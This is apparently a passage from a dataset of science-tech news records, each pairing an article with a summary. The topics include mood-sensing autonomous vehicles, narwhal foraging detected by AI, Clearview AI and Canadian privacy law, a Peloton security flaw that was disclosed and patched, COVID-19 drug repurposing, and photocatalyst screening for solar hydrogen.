machine-learning mechanisms that can continue to learn the driver's and passengers' moods over time. The results are then sent to the autonomous vehicle's software system allowing the vehicle to respond to perceived emotions by choosing an appropriate mode of operations such as normal, cautious or alert driving mode. -FAU-
Florida Atlantic University (FAU) 's Mehrdad Nojoumian has designed and patented new technology for autonomous systems that uses machine-learned human moods to respond to human emotions. Nojoumian's adaptive mood control system employs non-intrusive sensory solutions in semi- or fully autonomous vehicles to read the mood of drivers and passengers. In-vehicle sensors collect data based on facial expressions and other emotional cues of the vehicle's occupants, then use real-time machine learning mechanisms to identify occupants' moods over time. The vehicle responds to perceived emotions by selecting a suitable driving mode (normal, cautious, or alert). FAU's Stella Batalama said Nojoumian's system overcomes self-driving vehicles' inability to accurately forecast the behavior of other self-driving and human-driven vehicles.
[]
[]
[]
scitechnews
None
None
None
None
Florida Atlantic University (FAU) 's Mehrdad Nojoumian has designed and patented new technology for autonomous systems that uses machine-learned human moods to respond to human emotions. Nojoumian's adaptive mood control system employs non-intrusive sensory solutions in semi- or fully autonomous vehicles to read the mood of drivers and passengers. In-vehicle sensors collect data based on facial expressions and other emotional cues of the vehicle's occupants, then use real-time machine learning mechanisms to identify occupants' moods over time. The vehicle responds to perceived emotions by selecting a suitable driving mode (normal, cautious, or alert). FAU's Stella Batalama said Nojoumian's system overcomes self-driving vehicles' inability to accurately forecast the behavior of other self-driving and human-driven vehicles. Mehrdad Nojoumian, Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. Americans have one of the highest levels of fear in the world when it comes to technology related to robotic systems and self-driving cars. Addressing these concerns is paramount if the technology hopes to move forward. A researcher from Florida Atlantic University 's College of Engineering and Computer Science has developed new technology for autonomous systems that is responsive to human emotions based on machine-learned human moods. His solution, "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," has earned a very competitive utility patent from the United States Patent and Trademark Office for FAU. Adaptive Mood Control provides a convenient, pleasant, and more importantly, trustworthy experience for humans who interact with autonomous vehicles. The technology can be used in a wide range of autonomous systems, including self-driving cars, autonomous military vehicles, autonomous airplanes or helicopters, and even social robots. "The uniqueness of this invention is that the operational modes and parameters related to perceived emotion are exchanged with adjacent vehicles for achieving objectives of the adaptive mood control module in the semi or fully autonomous vehicle in a cooperative driving context," said Mehrdad Nojoumian , Ph.D., inventor, and an associate professor in the Department of Computer and Electrical Engineering and Computer Science and director of the Privacy, Security and Trust in Autonomy Lab. "Human-AI/autonomy interaction is at the center of attention by academia and industries. More specifically, trust between humans and AI/autonomous technologies plays a critical role in this domain, because it will directly affect the social acceptability of these modern technologies." The patent, titled "Adaptive Mood Control in Semi or Fully Autonomous Vehicles," uses non-intrusive sensory solutions in semi or fully autonomous vehicles to perceive the mood of the drivers and passengers. Information is collected based on facial expressions, sensors within the handles/seats and thermal cameras among other monitoring devices. Additionally, the adaptive mood control system contains real-time machine-learning mechanisms that can continue to learn the driver's and passengers' moods over time. The results are then sent to the autonomous vehicle's software system allowing the vehicle to respond to perceived emotions by choosing an appropriate mode of operations such as normal, cautious or alert driving mode. -FAU-
241
Algorithm Reveals Mysterious Foraging Habits of Narwhals
The small whale, known for its distinctively spiraled tusk, is under mounting pressure due to warming waters and the subsequent increase in Arctic shipping traffic. To better care for narwhals, we need to learn more about their foraging behaviour - and how these may change as a result of human disturbances and global warming. Biologists know almost nothing about this. Because narwhals live in isolated Arctic regions and hunt at depths of up to 1,000 meters, it is very difficult - sometimes impossible - to gain any insight whatsoever. Ironically, artificial intelligence may be the answer to the mystery of their natural behaviours. An interdisciplinary collaboration between mathematicians, computer scientists and marine biologists from the University of Copenhagen and the Greenland Institute of Natural Resources demonstrates that algorithms can be used to map the foraging behavior of this enigmatic whale. "We have shown that our algorithm can actually predict that when narwhals emit certain sounds, they are hunting prey. This opens up entirely new insights into the life of narwhals," explains Susanne Ditlevsen, a professor at UCPH's Department of Mathematical Sciences who has helped marine biologists in Greenland with the processing of data for several years. "It is crucial to gain more insight into where and when narwhals hunt for food as sea ice recedes. If they are disturbed by shipping traffic, it matters whether this is in the middle of an important foraging area. Finding out however, is incredibly difficult. Here, artificial intelligence seems to be able to make a huge difference and to a great extent, provide us with knowledge that could not otherwise have been obtained," says cetacean researcher Mads Peter Heide-Jørgensen, a professor at the Greenland Institute of Natural Resources and adjunct professor at the University of Copenhagen. He adds: "In a situation where narwhals are in deep water, in the middle of the Bay of Baffin during December, we currently have no way of finding out where or when they are foraging. Here, artificial intelligence seems to be the way forward." Until now, the best way to learn about the hunting patterns of narwhals has been to collect acoustic data using measuring instruments attached to their bodies. Like bats, narwhals orient themselves using echolocation. By making clicking sounds, they explore their environment and orient themselves. As they begin to hunt, these clicks shorten in interval to become buzzing. While the buzzing sounds are therefore interesting to researchers, it is impossible to collect acoustic data in many places. Furthermore, recording these sounds is highly data-intensive and time consuming to analyze manually. As a result, the researchers set out to investigate whether, by using artificial intelligence, they could find a pattern in the way whales move and the buzzes they emit. In the future, this would make it possible for them to rely only on measurements of animal movements using an accelerometer, a simple to use technology familiar to us from our smartphones. "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales as well as their buzzing sounds. The algorithm then discovered connections between the two," explains Assistant Professor Raghavendra Selvan of the Department of Computer Science. The researchers trained the algorithm using large quantities of data collected from five narwhals in Scoresby Sound fjord in East Greenland. Now, the researchers hope to add to the algorithm by characterizing different types of buzzing sounds in order to identify the precise buzzing sounds that lead to a catch. This can be achieved by collecting data in which biologists give whales a temperature pill that detects temperature drops in their stomachs as they consume cold fish or squid.
Researchers at Denmark's University of Copenhagen and the Greenland Institute of Natural Resources utilized algorithms in their study of the foraging habits of narwhals, and how they may be affected by human disturbances and global warming. The researchers used artificial intelligence to detect patterns in the way narwhals move and the sounds they emit. Among their findings was that certain sounds indicate when narwhals are hunting prey. University of Copenhagen's Raghavendra Selvan said, "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales, as well as their buzzing sounds. The algorithm then discovered connections between the two."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Denmark's University of Copenhagen and the Greenland Institute of Natural Resources utilized algorithms in their study of the foraging habits of narwhals, and how they may be affected by human disturbances and global warming. The researchers used artificial intelligence to detect patterns in the way narwhals move and the sounds they emit. Among their findings was that certain sounds indicate when narwhals are hunting prey. University of Copenhagen's Raghavendra Selvan said, "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales, as well as their buzzing sounds. The algorithm then discovered connections between the two." The small whale, known for its distinctively spiraled tusk, is under mounting pressure due to warming waters and the subsequent increase in Arctic shipping traffic. To better care for narwhals, we need to learn more about their foraging behaviour - and how these may change as a result of human disturbances and global warming. Biologists know almost nothing about this. Because narwhals live in isolated Arctic regions and hunt at depths of up to 1,000 meters, it is very difficult - sometimes impossible - to gain any insight whatsoever. Ironically, artificial intelligence may be the answer to the mystery of their natural behaviours. An interdisciplinary collaboration between mathematicians, computer scientists and marine biologists from the University of Copenhagen and the Greenland Institute of Natural Resources demonstrates that algorithms can be used to map the foraging behavior of this enigmatic whale. "We have shown that our algorithm can actually predict that when narwhals emit certain sounds, they are hunting prey. This opens up entirely new insights into the life of narwhals," explains Susanne Ditlevsen, a professor at UCPH's Department of Mathematical Sciences who has helped marine biologists in Greenland with the processing of data for several years. "It is crucial to gain more insight into where and when narwhals hunt for food as sea ice recedes. If they are disturbed by shipping traffic, it matters whether this is in the middle of an important foraging area. Finding out however, is incredibly difficult. Here, artificial intelligence seems to be able to make a huge difference and to a great extent, provide us with knowledge that could not otherwise have been obtained," says cetacean researcher Mads Peter Heide-Jørgensen, a professor at the Greenland Institute of Natural Resources and adjunct professor at the University of Copenhagen. He adds: "In a situation where narwhals are in deep water, in the middle of the Bay of Baffin during December, we currently have no way of finding out where or when they are foraging. Here, artificial intelligence seems to be the way forward." Until now, the best way to learn about the hunting patterns of narwhals has been to collect acoustic data using measuring instruments attached to their bodies. Like bats, narwhals orient themselves using echolocation. By making clicking sounds, they explore their environment and orient themselves. As they begin to hunt, these clicks shorten in interval to become buzzing. While the buzzing sounds are therefore interesting to researchers, it is impossible to collect acoustic data in many places. Furthermore, recording these sounds is highly data-intensive and time consuming to analyze manually. As a result, the researchers set out to investigate whether, by using artificial intelligence, they could find a pattern in the way whales move and the buzzes they emit. In the future, this would make it possible for them to rely only on measurements of animal movements using an accelerometer, a simple to use technology familiar to us from our smartphones. "The major challenge was that these whales have very complex movement patterns, which can be tough to analyze. This becomes possible only with the use of deep learning, which could learn to recognize both the various swimming patterns of whales as well as their buzzing sounds. The algorithm then discovered connections between the two," explains Assistant Professor Raghavendra Selvan of the Department of Computer Science. The researchers trained the algorithm using large quantities of data collected from five narwhals in Scoresby Sound fjord in East Greenland. Now, the researchers hope to add to the algorithm by characterizing different types of buzzing sounds in order to identify the precise buzzing sounds that lead to a catch. This can be achieved by collecting data in which biologists give whales a temperature pill that detects temperature drops in their stomachs as they consume cold fish or squid.
242
Canadian Regulators Seek Policy Amendments for Facial Recognition
Canada's Office of the Privacy Commissioner has cited the Royal Canadian Mounted Police (RCMP) for breaking federal privacy law by using facial recognition software from Clearview AI. Regulators said Clearview compiled biometric information without the knowledge or consent of individuals; the company has a database of roughly 3 billion photos harvested from the Internet. Canadian Privacy Commissioner Daniel Therrien also requested clarification from Canada's Parliament on the treatment of online images of people's faces, and said police must ensure third-party data providers' information collection practices comply with privacy statutes. Therrien said Canadian laws should stipulate that the concept of publicly available personal information "does not apply to information where an individual has a reasonable expectation of privacy."
[]
[]
[]
scitechnews
None
None
None
None
Canada's Office of the Privacy Commissioner has cited the Royal Canadian Mounted Police (RCMP) for breaking federal privacy law by using facial recognition software from Clearview AI. Regulators said Clearview compiled biometric information without the knowledge or consent of individuals; the company has a database of roughly 3 billion photos harvested from the Internet. Canadian Privacy Commissioner Daniel Therrien also requested clarification from Canada's Parliament on the treatment of online images of people's faces, and said police must ensure third-party data providers' information collection practices comply with privacy statutes. Therrien said Canadian laws should stipulate that the concept of publicly available personal information "does not apply to information where an individual has a reasonable expectation of privacy."
243
McAfee Finds Security Vulnerability in Peloton Products
Software security company McAfee said it exposed a vulnerability in the Peloton Bike+ that allowed attackers to install malware through a USB port and potentially spy on riders. The Advanced Threat Research Team at McAfee said the problem stemmed from the Android attachment that accompanies the Peloton stationary exercise Bike+. McAfee said attackers could access the bike through the port and install fake versions of popular apps like Netflix and Spotify, which could then fool users into entering their personal information. A Peloton Bike+ in a public, shared place, such as a hotel or a gym, would be especially vulnerable to the attack. "The flaw was that Peloton actually failed to validate that the operating system loaded," said Steve Povolny, head of the threat research team. "And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Povolny said there are "interactive maps" online showing Peloton bikes and treadmills in the U.S., which can give attackers an easy way to find those in public spaces and eventually access users' accounts. Hackers could then upload a "completely customized malicious image" that would eventually grant them access to a rider's microphone, camera and apps, he said. "Not only could you spy on riders but, maybe more importantly, their surroundings, sensitive information," Povolny said. Peloton confirmed in a statement that engineers from McAfee alerted them to the problem "via our Coordinated Vulnerability Disclosure program" and said they were working with the security company to fix the issue. McAfee said it disclosed the vulnerability to Peloton about three months ago and heard back from the company within a couple of weeks. "McAfee reported a vulnerability to us that required direct, physical access to a Peloton Bike+ or Tread to exploit the issue," the exercise equipment company said in a statement. "Peloton also pushed a mandatory update to affected devices last week that addressed this vulnerability." Experts say any device that connects to the internet - like a TV, an appliance or even a toy - could be a way for hackers to get your personal data. Cybersecurity experts say you should turn on automatic software updates and consider security software for your home network. Peloton recalled its Tread+ and Tread treadmills early last month, citing safety concerns that arose after numerous people were injured and a child died. The Consumer Product Safety Commission, or CPSC, had urged parents to stop using the Tread+ in an "urgent warning" it issued April 17. "CPSC staff believes the Peloton Tread+ poses serious risks to children for abrasions, fractures, and death," a CPSC statement read. "In light of multiple reports of children becoming entrapped, pinned, and pulled under the rear roller of the product, CPSC urges consumers with children at home to stop using the product immediately." Peloton initially rebuked the CPSC's statement, saying its advice to all parents was "inaccurate and misleading." The company later apologized for not having immediately followed the agency's advice. After the recall of nearly 125,000 treadmills on May 5, Peloton updated its software to require users to enter a code to restart the belt if it has been left unmoving for up to 45 seconds.
Researchers at software security company McAfee discovered a vulnerability in the Peloton Bike+ that could enable attackers to install malware in the system through a USB port. The flaw, which the researchers said was associated with the Android attachment accompanying the Bike+, could allow attackers to access its webcam and spy on riders and their surroundings. It also could allow them to install fake versions of popular apps like Netflix and Spotify, and capture riders' personal information. McAfee's Steve Povolny said, "The flaw was that Peloton actually failed to validate that the operating system loaded. And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Peloton confirmed it was working with McAfee to fix the issue, adding that it recently pushed a mandatory update to affected devices to address the vulnerability.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at software security company McAfee discovered a vulnerability in the Peloton Bike+ that could enable attackers to install malware in the system through a USB port. The flaw, which the researchers said was associated with the Android attachment accompanying the Bike+, could allow attackers to access its webcam and spy on riders and their surroundings. It also could allow them to install fake versions of popular apps like Netflix and Spotify, and capture riders' personal information. McAfee's Steve Povolny said, "The flaw was that Peloton actually failed to validate that the operating system loaded. And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Peloton confirmed it was working with McAfee to fix the issue, adding that it recently pushed a mandatory update to affected devices to address the vulnerability. Software security company McAfee said it exposed a vulnerability in the Peloton Bike+ that allowed attackers to install malware through a USB port and potentially spy on riders. The Advanced Threat Research Team at McAfee said the problem stemmed from the Android attachment that accompanies the Peloton stationary exercise Bike+. McAfee said attackers could access the bike through the port and install fake versions of popular apps like Netflix and Spotify, which could then fool users into entering their personal information. A Peloton Bike+ in a public, shared place, such as a hotel or a gym, would be especially vulnerable to the attack. "The flaw was that Peloton actually failed to validate that the operating system loaded," said Steve Povolny, head of the threat research team. "And ultimately what that means then is they can install malicious software, they can create Trojan horses and give themselves back doors into the bike, and even access the webcam." Povolny said there are "interactive maps" online showing Peloton bikes and treadmills in the U.S., which can give attackers an easy way to find those in public spaces and eventually access users' accounts. Hackers could then upload a "completely customized malicious image" that would eventually grant them access to a rider's microphone, camera and apps, he said. "Not only could you spy on riders but, maybe more importantly, their surroundings, sensitive information," Povolny said. Peloton confirmed in a statement that engineers from McAfee alerted them to the problem "via our Coordinated Vulnerability Disclosure program" and said they were working with the security company to fix the issue. McAfee said it disclosed the vulnerability to Peloton about three months ago and heard back from the company within a couple of weeks. "McAfee reported a vulnerability to us that required direct, physical access to a Peloton Bike+ or Tread to exploit the issue," the exercise equipment company said in a statement. "Peloton also pushed a mandatory update to affected devices last week that addressed this vulnerability." Experts say any device that connects to the internet - like a TV, an appliance or even a toy - could be a way for hackers to get your personal data. Cybersecurity experts say you should turn on automatic software updates and consider security software for your home network. Peloton recalled its Tread+ and Tread treadmills early last month, citing safety concerns that arose after numerous people were injured and a child died. The Consumer Product Safety Commission, or CPSC, had urged parents to stop using the Tread+ in an "urgent warning" it issued April 17. "CPSC staff believes the Peloton Tread+ poses serious risks to children for abrasions, fractures, and death," a CPSC statement read. "In light of multiple reports of children becoming entrapped, pinned, and pulled under the rear roller of the product, CPSC urges consumers with children at home to stop using the product immediately." Peloton initially rebuked the CPSC's statement, saying its advice to all parents was "inaccurate and misleading." The company later apologized for not having immediately followed the agency's advice. After the recall of nearly 125,000 treadmills on May 5, Peloton updated its software to require users to enter a code to restart the belt if it has been left unmoving for up to 45 seconds.
244
Researchers Identify 16 Medicines That Could Be Used to Treat COVID-19
Medicine repositioning is the quickest way to find treatments for the disease among existing medicines, without waiting to complete the clinical trial phases required to develop a new one. Researchers from the ESI International Chair of the CEU Cardenal Herrera University (CEU UCH) and ESI Group have just published in scientific journal Pharmaceutics a new computational topology strategy to identify existing medicines that could be applied to treat COVID-19 without waiting for the research and clinical trial phases required to develop a new medicine. This mathematical model applies Topologic Data Analysis in a pioneering way in order to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins such as protein NSP12, an enzyme in charge of replicating the viral RNA. According to ESI-CU Chair director Antonio Falcó, "this type of analysis requires comparing a large number of parameters, which is why it is necessary to apply advanced computational techniques such as the ones we develop at the ESI-CEU Chair, which we apply to very diverse fields: from designing new materials, to optimising manufacturing processes. Now we have used our knowledge to tackle the challenge posed by the pandemic, to find known treatments that can be effective to treat COVID-19 as fast as possible by comparing, for the first time, the topological structure of proteins." Innovation in medicine repositioning Even though other research groups have applied computational methods to reposition medicines to treat COVID-19, ESI Chair researcher Joan Climent highlights that "we are the first group on an international level to apply the latest breakthroughs in topologic data analysis (TDA), which is used to study the properties of geometric bodies, to analyse biological geometries in the context of medicine repositioning. Our starting point is the idea that known medicines that act against a certain protein as a therapeutic target can also act against other proteins that have a three-dimensional structure with a high degree of topological similarity." In the case of COVID-19, it is known that protein NSP12, an RNA polymerase that depends on RNA and is in charge of the viral RNA replicating in the host cells, is one of the most interesting and promising pharmacological targets. "Medicines that are effective against proteins with a three-dimensional topological structure that is highly similar to the NSP12 protein of SARS-CoV-2 could also be effective against this protein." Sixteen medicines of 1,825 analysed The study of the ESI-CEU Chair, published in Pharmaceutics, looked at the 1,825 medicines approved by the FDA, the American Food and Drug Administration. According to the Drug Bank repository, these medicines are connected to 27,830 protein structures. In the first phase of this mass analysis, the researchers compared the topological structure of these thousands of proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus. There turned out to be three viral proteins with highly significant topological similarities to target protein structures of known medicines: viral protease 3CL, endoribonuclease NSP15 and RNA-dependent RNA polymerase NSP12. With this methodology, among the 1,825 medicines approved by the FDA, the research team was able to identify 16 medicines that act against these three proteins as their therapeutic target. Among these 16 medicines are rutin, a flavonoid that inhibits platelet aggregation; dexamethasone, a glucocorticoid that acts as an anti-inflammatory and immunosuppressor; and vemurafenib, a kinase inhibitor suited for adult patients with melanoma. With these medicines now identified, they will now have to be subjected to in vitro and in vivo clinical studies to confirm the possible efficiency detected by the mathematical model and to determine the best combination of them to treat the symptoms caused by COVID-19. Dexamethasone is currently one of the most used medicines that has the most success treating advanced COVID-19 disease. New variant and future pandemics The authors of the study, all ESI-CEU Chair researchers, also highlight the future usefulness of this new strategy to reposition medicines: "If we consider that half of these new virus variants have modified genes that code the Spike protein, this technique can be useful to reposition new medicines depending on the changes of the protein structure in the new variants. Furthermore, this strategy could be applied both to the SARS-CoV-2 coronavirus and its new variants, as well as to any new viruses that may appear in the future, identifying their proteins and comparing their topological structure to that of the target proteins in known medicines, using this same strategy. The researchers who performed this study are, together with Chair director Antonio Falcó Montesinos, and Joan Climent Bataller, from the Department of Animal Production and Health of the CEU UCH, Raúl Pérez Moraga, Jaume Forés Martos and Beatriz Suay García, from the Department of Mathematics, Physics and Computing Sciences of the CEU UCH, and Jean Louis Duval, from the French multinational company ESI Group, partner of the CEU UCH in the ESI-CEU international Chair. Article Pérez-Moraga, R.; Forés-Martos, J.; Suay-García, B.; Duval, J.-L.; Falcó, A.; Climent, J. A COVID-19 Drug Repurposing Strategy through Quantitative Homological Similarities Using a Topological Data Analysis-Based Framework. Pharmaceutics 2021 , 13 , 488. DOI: https://doi.org/10.3390/ pharmaceutics13040488
Researchers from the ESI International Chair of the CEU Cardenal Herrera University and ESI Group used a new computational topology strategy to determine which existing medicines could be used to treat COVID-19. The model uses topologic data analysis to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins, such as protein NSP12. The researchers studied 1,825 medicines approved by the U.S. Food and Drug Administration, which are connected to 27,830 protein structures. In comparing the topological structure of the proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus, they identified 16 medicines that act against the three viral proteins found to have highly significant topological similarities to target protein structures of the known medicines. These drugs can now be studied to determine the most effective combination of them to treat COVID-19 symptoms.
[]
[]
[]
scitechnews
None
None
None
None
Researchers from the ESI International Chair of the CEU Cardenal Herrera University and ESI Group used a new computational topology strategy to determine which existing medicines could be used to treat COVID-19. The model uses topologic data analysis to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins, such as protein NSP12. The researchers studied 1,825 medicines approved by the U.S. Food and Drug Administration, which are connected to 27,830 protein structures. In comparing the topological structure of the proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus, they identified 16 medicines that act against the three viral proteins found to have highly significant topological similarities to target protein structures of the known medicines. These drugs can now be studied to determine the most effective combination of them to treat COVID-19 symptoms. Medicine repositioning is the quickest way to find treatments for the disease among existing medicines, without waiting to complete the clinical trial phases required to develop a new one. Researchers from the ESI International Chair of the CEU Cardenal Herrera University (CEU UCH) and ESI Group have just published in scientific journal Pharmaceutics a new computational topology strategy to identify existing medicines that could be applied to treat COVID-19 without waiting for the research and clinical trial phases required to develop a new medicine. This mathematical model applies Topologic Data Analysis in a pioneering way in order to compare the three-dimensional structure of the target proteins of known medicines to SARS-CoV-2 coronavirus proteins such as protein NSP12, an enzyme in charge of replicating the viral RNA. According to ESI-CU Chair director Antonio Falcó, "this type of analysis requires comparing a large number of parameters, which is why it is necessary to apply advanced computational techniques such as the ones we develop at the ESI-CEU Chair, which we apply to very diverse fields: from designing new materials, to optimising manufacturing processes. Now we have used our knowledge to tackle the challenge posed by the pandemic, to find known treatments that can be effective to treat COVID-19 as fast as possible by comparing, for the first time, the topological structure of proteins." Innovation in medicine repositioning Even though other research groups have applied computational methods to reposition medicines to treat COVID-19, ESI Chair researcher Joan Climent highlights that "we are the first group on an international level to apply the latest breakthroughs in topologic data analysis (TDA), which is used to study the properties of geometric bodies, to analyse biological geometries in the context of medicine repositioning. Our starting point is the idea that known medicines that act against a certain protein as a therapeutic target can also act against other proteins that have a three-dimensional structure with a high degree of topological similarity." In the case of COVID-19, it is known that protein NSP12, an RNA polymerase that depends on RNA and is in charge of the viral RNA replicating in the host cells, is one of the most interesting and promising pharmacological targets. "Medicines that are effective against proteins with a three-dimensional topological structure that is highly similar to the NSP12 protein of SARS-CoV-2 could also be effective against this protein." Sixteen medicines of 1,825 analysed The study of the ESI-CEU Chair, published in Pharmaceutics, looked at the 1,825 medicines approved by the FDA, the American Food and Drug Administration. According to the Drug Bank repository, these medicines are connected to 27,830 protein structures. In the first phase of this mass analysis, the researchers compared the topological structure of these thousands of proteins available in the Protein Data Bank with the 23 proteins of the SARS-CoV-2 coronavirus. There turned out to be three viral proteins with highly significant topological similarities to target protein structures of known medicines: viral protease 3CL, endoribonuclease NSP15 and RNA-dependent RNA polymerase NSP12. With this methodology, among the 1,825 medicines approved by the FDA, the research team was able to identify 16 medicines that act against these three proteins as their therapeutic target. Among these 16 medicines are rutin, a flavonoid that inhibits platelet aggregation; dexamethasone, a glucocorticoid that acts as an anti-inflammatory and immunosuppressor; and vemurafenib, a kinase inhibitor suited for adult patients with melanoma. With these medicines now identified, they will now have to be subjected to in vitro and in vivo clinical studies to confirm the possible efficiency detected by the mathematical model and to determine the best combination of them to treat the symptoms caused by COVID-19. Dexamethasone is currently one of the most used medicines that has the most success treating advanced COVID-19 disease. New variant and future pandemics The authors of the study, all ESI-CEU Chair researchers, also highlight the future usefulness of this new strategy to reposition medicines: "If we consider that half of these new virus variants have modified genes that code the Spike protein, this technique can be useful to reposition new medicines depending on the changes of the protein structure in the new variants. Furthermore, this strategy could be applied both to the SARS-CoV-2 coronavirus and its new variants, as well as to any new viruses that may appear in the future, identifying their proteins and comparing their topological structure to that of the target proteins in known medicines, using this same strategy. The researchers who performed this study are, together with Chair director Antonio Falcó Montesinos, and Joan Climent Bataller, from the Department of Animal Production and Health of the CEU UCH, Raúl Pérez Moraga, Jaume Forés Martos and Beatriz Suay García, from the Department of Mathematics, Physics and Computing Sciences of the CEU UCH, and Jean Louis Duval, from the French multinational company ESI Group, partner of the CEU UCH in the ESI-CEU international Chair. Article Pérez-Moraga, R.; Forés-Martos, J.; Suay-García, B.; Duval, J.-L.; Falcó, A.; Climent, J. A COVID-19 Drug Repurposing Strategy through Quantitative Homological Similarities Using a Topological Data Analysis-Based Framework. Pharmaceutics 2021 , 13 , 488. DOI: https://doi.org/10.3390/ pharmaceutics13040488
245
Computers Help Researchers Find Materials to Turn Solar Power into Hydrogen
UNIVERSITY PARK, Pa. -- Using solar energy to inexpensively harvest hydrogen from water could help replace carbon-based fuel sources and shrink the world's carbon footprint. However, finding materials that could boost hydrogen production so that it could compete economically with carbon-based fuels has been, as yet, an insurmountable challenge. In a study, a Penn State-led team of researchers report they have taken a step toward overcoming the challenge of inexpensive hydrogen production by using supercomputers to find materials that could help accelerate hydrogen separation when water is exposed to light, a process called photocatalysis. Both electricity and solar energy can be used to separate hydrogen from water, which is made up of two hydrogen atoms and an oxygen atom, according to Ismaila Dabo, associate professor of materials science and engineering . Institute for Computational and Data Sciences (ICDS) affiliate and co-funded faculty member of the Institutes of Energy and the Environment . Using sunlight to generate electricity to create hydrogen -- or electrolysis --, which, in turn, would likely be converted back into electricity may not be technically advantageous or economically effective. While using solar energy directly to produce hydrogen from water -- or photocatalysis -- avoids that extra step, researchers have yet to be able to use direct solar hydrogen conversion in a way that would compete with carbon-based fuels, such as gasoline. The researchers, who report their findings in Energy and Environmental Science , used a type of computational approach called high-throughput materials screening to narrow a list of more than 70,000 different compounds down to six promising candidates for those photocatalysts, which, when added to water, can enable the solar hydrogen production process, said Dabo. They examined the compounds listed in the Materials Project database, an online open-access repository of known and predicted materials. The team developed an algorithm to identify materials with properties that would make them suitable photocatalysts for the hydrogen production process. For example, the researchers investigated the ideal energy range -- or the band gap -- for the materials to absorb sunlight. Working closely with Héctor Abruña, professor of chemistry at Cornell; Venkatraman Gopalan, professor of materials science and engineering at Penn State; and Raymond Schaak, professor of chemistry at Penn State; they also looked at materials that could effectively dissociate water, as well as materials that offered good chemical stability. "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts," said Yihuang Xiong, graduate research assistant and co-first author of the paper. "We hope that, by doing so, we will be able to reduce the cost of hydrogen production." Dabo added the team focused on oxides -- chemical compounds made up of at least one oxygen atom -- because they can be synthesized in a reasonable amount of time using standard processes. The work required collaborations from across disciplines, which served as a learning experience for the research team. "I found it very rewarding to have worked on such a collaborative project," said Nicole Kirchner-Hall, doctoral student and co-author of the paper. "As a graduate student specializing in computational material science, I was able to predict possible photocatalytic materials using calculations and work with experimental collaborators here at Penn State and other institutions to co-validate our computational predictions." Other researchers have previously conducted an economic analysis on several options of using solar energy to produce electricity and determined that solar could drop the price of hydrogen production to compete with gasoline, said Dabo. "Their essential conclusion was that if you were able to develop this technology, you could produce hydrogen at the cost of $1.60 to $3.20 per equivalent gallon of gasoline," said Dabo. "So, compare that to gasoline, which is around $3 a gallon, if this works, you could pay as low as $1.60 for about the same amount of energy as a gallon of gas in the ideal case scenario." He added that if a catalyst can help boost solar hydrogen production, this could lead to a hydrogen price that is competitive with gasoline. The team relied on Penn State ICDS's Roar supercomputer for the computations. According to Dabo, computers represent an important tool in speeding up the process to find the right materials to be used in specific processes. This computationally driven, data-intensive method could represent a revolution in efficiency over the painstaking trial-and-error approach. "When Thomas Edison wanted to find materials for the light bulb, he looked at just about every material under the sun until he found the right material for the light bulb," said Dabo. "Here we're trying to do the same thing, but in a way to use computers to accelerate that process." He added that computers will not replace experimentation. "Computers can make the recommendations as to what materials will be the most promising and then you still need to do the experimental study," said Dabo. Dabo said he expects the power of computers will streamline the process of finding the best candidates and dramatically cut the time it takes to design materials in the lab to bring them to market to address needs. The researchers evaluated machine learning algorithms to make suggestions for chemicals that could be synthesized and used as catalysts in solar hydrogen production. Based on this preliminary investigation, they suggest future work may focus on developing machine learning models to improve the chemical screening process. Dabo also added that they may look at chemical compounds outside of oxides to determine if they might serve as catalysts for solar hydrogen production. "So far, we did one cycle of this process on oxides -- essentially rusted metals -- but there are a lot of compounds that could be made that aren't based on oxygen," said Dabo. "For example, there are compounds based on nitrogen or sulfur, that we could explore." The National Science Foundation (NSF) and the HydroGEN Advanced Water Splitting Materials Consortium of the U.S. Department of Energy (DOE) supported this work. The team also included Quinn T. Campbell, postdoctoral scholar at Sandia National Laboratories; Julian Fanghanel, graduate student in materials science and engineering at Penn State; Catherine K. Badding, undergraduate student in chemistry at Cornell and DOE Science Undergraduate Laboratory Internship Fellow (now graduate student at MIT); Huaiyu Wang, graduate student in materials science and engineering at Penn State; Monica J. Theibault, graduate student in chemistry at Cornell; Iurii Timrov, postdoctoral scholar at École Polytechnique Fédérale de Lausanne, Switzerland; Jared S. Mondschein, graduate student in chemistry at Penn State; Kriti Seth, graduate student in chemistry at Penn State; Rebecca Katz, graduate student in chemistry at Penn State; Andrés Molina Villarino, graduate student in chemistry at Cornell; Betül Pamuk, postdoctoral scholar in physics at Cornell; Megan E. Penrod, undergraduate student in materials science and engineering at Penn State (now graduate student at University of Florida); Mohammed M. Khan, undergraduate student in materials science and engineering at Penn State (now graduate student at KAUST); Tiffany Rivera, NSF Research Experiences for Undergraduates Fellow; Nathan C. Smith, NSF Research Experiences for Undergraduates Fellow; Xavier Quintana, NSF Research Experiences for Undergraduates Fellow; Paul Orbe, NSF Research Experiences for Teachers Fellow; Craig J. Fennie, professor of physics at Cornell; Senorpe Asem-Hiablie, courtesy assistant research professor at the Penn State Institutes of Energy and the Environment; James L. Young, researcher at the National Renewable Energy Laboratory; Todd G. Deutsch, researcher at the National Renewable Energy Laboratory; and Matteo Cococcioni, professor of physics at University of Pavia, Italy.
